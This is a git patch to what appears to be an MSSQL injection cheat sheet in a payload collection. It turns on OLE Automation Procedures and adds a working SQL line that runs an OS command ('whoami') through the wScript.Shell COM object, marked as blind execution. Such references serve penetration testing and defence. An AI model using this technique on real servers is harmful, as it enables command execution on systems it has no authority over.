From 981a76f2fdfff6e3347438fe85e955e2d7502d51 Mon Sep 17 00:00:00 2001
From: f0rk3b0mb
Date: Tue, 28 Apr 2026 11:51:38 +0300
Subject: [PATCH] added ole automation command execution
---
 SQL Injection/MSSQL Injection.md | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)
diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md
index a770988b..d010079f 100644
--- a/SQL Injection/MSSQL Injection.md
+++ b/SQL Injection/MSSQL Injection.md
@@ -300,26 +300,26 @@ EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open
 `Object Linking and Embedding (OLE)` is a technology that allows one application to link objects into another application. It was originally designed for Microsoft Office (e.g. to embed Excel sheets into Word documents) and eventually became the foundation for the Component Object Model (COM). OLE Automation enables a SQL server to interact with arbitrary COM objects.
-```
-> Check current status
+```sql
+-- Check current status
 EXEC sp_configure 'Ole Automation Procedures';
-> Enable OLE Automation
+-- Enable OLE Automation
 EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;
-> Verify it's enabled
+-- Verify it's enabled
 EXEC sp_configure 'Ole Automation Procedures';
-> run command
+-- run command
-DECLARE @output INT; DECLARE @ProgramToRun VARCHAR(500); SET @ProgramToRun = 'Run("")'; EXEC sp_oacreate 'wScript.Shell', @output out; EXEC sp_oamethod @output, @ProgramToRun; EXEC sp_oadestroy @output;
+DECLARE @output INT; DECLARE @ProgramToRun VARCHAR(500); SET @ProgramToRun = 'Run("whoami")'; EXEC sp_oacreate 'wScript.Shell', @output out; EXEC sp_oamethod @output, @ProgramToRun; EXEC sp_oadestroy @output;
->> NOTE that it does not print output (it is blind execution)
+-- NOTE that it does not print output (it is blind execution)
 ```